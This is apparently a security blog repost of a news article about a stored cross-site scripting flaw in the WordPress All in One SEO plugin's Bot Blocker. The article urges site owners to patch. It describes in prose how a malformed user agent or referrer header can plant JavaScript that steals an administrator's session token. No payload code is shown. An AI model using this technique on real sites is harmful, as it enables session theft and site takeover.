Nasty session stealing hole filled in WordPress All in One SEO plugin

A million sites are at risk. Again. So patch, please. Wordpress has patched a hole in its popular All in One search engine optimisation plugin, a tool that’s been downloaded by some 30 million users and is used on a million sites.

Flaws exists in the Bot Blocker component which can be exploited to steal administrator tokens and conduct actions through cross-site scripting vulnerabilities.

Users must upgrade to version to guard against the flaw, which only manifests when users activate the tracked bot setting.

Dutch researcher David Vaartjes posted a proof-of-concept exploit detailing how to exploit exposed sites.

He says attackers can lace request headers with malicious Javascript that will be logged inside the tracked bot panel page, and then executed to nab an admin’s session token.

“A stored cross-site scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress plugin,” Vaartjes says.

“Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the admin dashboard by just visiting the public site with a malformed user agent or referrer header.

“If the ‘track blocked bots’ setting is [deliberately] enabled, blocked request are logged in that HTML page without proper sanitisation or output encoding, allowing XSS.”

Proof-of-concept XSS demo

WordPress sites are a favourite for attackers, because scores of exploits target the core CMS and many more attack the many third-party plugins that enhance its functionality. Plenty of admins patch neither the CMS or plugins, or patch the CMS and neglect plugins that patch on different cycles. Whatever the reason for patches being missed, WordPress often ends up used used often in command and control infrastructure to deliver exploit kits and various drive-by-downloads.



About webimprint

Webimprints is the leading company which provides global information security services to the client around the World.
This entry was posted in Cyber Security, Vulnerabilidad and tagged , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s